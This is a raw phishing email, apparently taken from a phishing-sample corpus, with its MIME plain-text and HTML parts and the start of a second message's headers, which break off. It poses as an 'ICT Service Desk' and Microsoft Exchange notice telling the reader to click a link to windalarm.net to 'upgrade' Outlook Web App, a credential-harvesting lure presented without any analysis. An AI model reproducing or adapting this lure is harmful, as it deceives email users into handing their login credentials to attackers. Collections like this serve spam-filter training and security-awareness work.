From: Lisa Newsome
Sent: Tuesday, September 01, 2015 10:13 AM
To: Lisa Newsome
Subject: ICT Service Desk

Dear Valued User,

ICT Service Desk require you to upgrade to the latest e-mail Outlook Web Ap=
ps 2015 , kindly Click Here<http://windalarm.net/OWA/WEBMAIL.html> to upgra=
de to the latest e-mail  Outlook Web Apps 2015.

Connected with Microsoft Exchange
=A9 2015 Microsoft
Corporation. All rights reserved

--_000_E28B8F3095558C4C8EAF98D26835AE4E08FFEDNEX1CRBLOCAL_
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<html dir=3D"ltr">
<head>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859-=
1">
<style>=0A=
<!--=0A=
@font-face=0A=
	{font-family:Wingdings}=0A=
@font-face=0A=
	{font-family:"Cambria Math"}=0A=
@font-face=0A=
	{font-family:Calibri}=0A=
p.MsoNormal, li.MsoNormal, div.MsoNormal=0A=
	{margin:0in;=0A=
	margin-bottom:.0001pt;=0A=
	font-size:11.0pt;=0A=
	font-family:"Calibri",sans-serif}=0A=
a:link, span.MsoHyperlink=0A=
	{color:#0563C1;=0A=
	text-decoration:underline}=0A=
a:visited, span.MsoHyperlinkFollowed=0A=
	{color:#954F72;=0A=
	text-decoration:underline}=0A=
p.MsoListParagraph, li.MsoListParagraph, div.MsoListParagraph=0A=
	{margin-top:0in;=0A=
	margin-right:0in;=0A=
	margin-bottom:0in;=0A=
	margin-left:.5in;=0A=
	margin-bottom:.0001pt;=0A=
	font-size:11.0pt;=0A=
	font-family:"Calibri",sans-serif}=0A=
span.EmailStyle17=0A=
	{font-family:"Calibri",sans-serif;=0A=
	color:windowtext}=0A=
.MsoChpDefault=0A=
	{font-family:"Calibri",sans-serif}=0A=
@page WordSection1=0A=
	{margin:1.0in 1.0in 1.0in 1.0in}=0A=
ol=0A=
	{margin-bottom:0in}=0A=
ul=0A=
	{margin-bottom:0in}=0A=
-->=0A=
</style><style type=3D"text/css" id=3D"owaParaStyle">=0A=
<!--=0A=
-->=0A=
</style>
</head>
<body lang=3D"EN-US" link=3D"#0563C1" vlink=3D"#954F72" fpstyle=3D"1" ocsi=
=3D"0">
<div style=3D"direction: ltr;font-family: Tahoma;color: #000000;font-size: =
10pt;"><br>
<div style=3D"font-family: Times New Roman; color: #000000; font-size: 16px=
">
<hr tabindex=3D"-1">
<div id=3D"divRpF167903" style=3D"direction: ltr;"><font face=3D"Tahoma" si=
ze=3D"2" color=3D"#000000"><b>From:</b> Lisa Newsome<br>
<b>Sent:</b> Tuesday, September 01, 2015 10:13 AM<br>
<b>To:</b> Lisa Newsome<br>
<b>Subject:</b> ICT Service Desk<br>
</font><br>
</div>
<div></div>
<div>
<div style=3D"direction:ltr; font-family:Tahoma; color:#000000; font-size:1=
0pt">
<div style=3D"font-family:Times New Roman; color:#000000; font-size:16px">
<div>
<div style=3D"direction:ltr; font-family:Tahoma; color:#000000; font-size:1=
0pt">
<div style=3D"font-family:Times New Roman; color:#000000; font-size:16px">
<div>
<div style=3D"direction:ltr; font-family:Tahoma; color:#000000; font-size:1=
0pt">
<div style=3D"font-family:Times New Roman; color:#000000; font-size:16px">
<div>
<div style=3D"direction:ltr; font-family:Tahoma; color:#000000; font-size:1=
0pt">
<div style=3D"font-family:Times New Roman; color:#000000; font-size:16px">
<div>
<div style=3D"direction:ltr; font-family:Tahoma; color:#000000; font-size:1=
0pt">
<div style=3D"font-family:Times New Roman; color:#000000; font-size:16px">
<div><span style=3D"font-family:'Helvetica Neue','Segoe UI',Helvetica,Arial=
,'Lucida Grande',sans-serif; font-size:13px; background-color:rgb(255,255,2=
55)">Dear Valued User,</span><br style=3D"font-family:'Helvetica Neue','Seg=
oe UI',Helvetica,Arial,'Lucida Grande',sans-serif; font-size:13px; backgrou=
nd-color:rgb(255,255,255)">
<br style=3D"font-family:'Helvetica Neue','Segoe UI',Helvetica,Arial,'Lucid=
a Grande',sans-serif; font-size:13px; background-color:rgb(255,255,255)">
<span style=3D"font-family:'Helvetica Neue','Segoe UI',Helvetica,Arial,'Luc=
ida Grande',sans-serif; font-size:13px; background-color:rgb(255,255,255)">=
ICT Service Desk require you to upgrade to the latest e-mail Outlook Web Ap=
ps 2015 , kindly&nbsp;<b><a href=3D"http://windalarm.net/OWA/WEBMAIL.html" =
target=3D"_blank">Click
 Here</a></b>&nbsp;</span><span style=3D"font-family:'Helvetica Neue','Sego=
e UI',Helvetica,Arial,'Lucida Grande',sans-serif; font-size:13px; backgroun=
d-color:rgb(255,255,255)">to upgrade to the latest e-mail&nbsp; Outlook Web=
 Apps 2015.</span><br style=3D"font-family:'Helvetica Neue','Segoe UI',Helv=
etica,Arial,'Lucida Grande',sans-serif; font-size:13px; background-color:rg=
b(255,255,255)">
<br style=3D"font-family:'Helvetica Neue','Segoe UI',Helvetica,Arial,'Lucid=
a Grande',sans-serif; font-size:13px; background-color:rgb(255,255,255)">
<span style=3D"font-family:'Helvetica Neue','Segoe UI',Helvetica,Arial,'Luc=
ida Grande',sans-serif; font-size:13px; background-color:rgb(255,255,255)">=
Connected with Microsoft Exchange</span><br style=3D"font-family:'Helvetica=
 Neue','Segoe UI',Helvetica,Arial,'Lucida Grande',sans-serif; font-size:13p=
x; background-color:rgb(255,255,255)">
<span style=3D"font-family:'Helvetica Neue','Segoe UI',Helvetica,Arial,'Luc=
ida Grande',sans-serif; font-size:13px; background-color:rgb(255,255,255)">=
=A9 2015 Microsoft</span><br style=3D"font-family:'Helvetica Neue','Segoe U=
I',Helvetica,Arial,'Lucida Grande',sans-serif; font-size:13px; background-c=
olor:rgb(255,255,255)">
<span style=3D"font-family:'Helvetica Neue','Segoe UI',Helvetica,Arial,'Luc=
ida Grande',sans-serif; font-size:13px; background-color:rgb(255,255,255)">=
Corporation. All rights reserved</span>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</body>
</html>

--_000_E28B8F3095558C4C8EAF98D26835AE4E08FFEDNEX1CRBLOCAL_--

From anittala@ucalgary.ca  Tue Sep  1 11:58:34 2015
Return-Path: <anittala@ucalgary.ca>
X-Original-To: jose@login.monkey.org
Delivered-To: jose@login.monkey.org
Received: from forward.b.hostedemail.com (forward.b.hostedemail.com [64.98.36.17])
	by l.monkey.org (Postfix) with ESMTP id 456BFF4105
	for <jose@login.monkey.org>; Tue,  1 Sep 2015 11:58:34 -0500 (CDT)
Received: from smtpin04.hostedemail.com (10.5.19.248.rfc1918.com [10.5.19.248])
	by ofarelay01.b.hostedemail.com (Postfix) with SMTP id BE8DD34E3E2
	for <jose@login.monkey.org>; Tue,  1 Sep 2015 16:58:10 +0000 (UTC)
X-Forwarded-For: jose@monkey.org by Hostedemail
Delivered-To: jose@monkey.org
X-FDA: 70585283328.04.chalk18_64525267c391e
Authentication-Results: auth.b.hostedemail.com; dkim=none
	reason="no signature"; dkim-adsp=none (insecure policy);
	dkim-atps=neutral
X-Spam-Summary: 1,0,0,,d41d8cd98f00b204,anittala@ucalgary.ca,,RULES_HIT,0,RBL:65.55.169.80:@ucalgary.ca:.lbl8.mailshell.net-62.18.0.100 64.10.201.10,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fp,MSBL:0,DNSBL:neutral,Custom_rules:0:2:0
X-HE-Tag: chalk18_64525267c391e
X-Filterd-Recvd-Size: 8501
Received: from na01-bl2-obe.outbound.protection.outlook.com (mail-bl2on0080.outbound.protection.outlook.com [65.55.169.80])
	by imf21.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Tue,  1 Sep 2015 16:58:09 +0000 (UTC)
Received: from BN1PR01MB216.prod.exchangelabs.com (10.242.213.28) by
 BN1PR01MB216.prod.exchangelabs.com (10.242.213.28) with Microsoft SMTP Server
 (TLS) id 15.1.243.23; Tue, 1 Sep 2015 16:58:05 +0000
Received: from BN1PR01MB216.prod.exchangelabs.com ([169.254.6.248]) by
 BN1PR01MB216.prod.exchangelabs.com ([169.254.6.248]) with mapi id
 15.01.0243.024; Tue, 1 Sep 2015 16:58:05 +0000
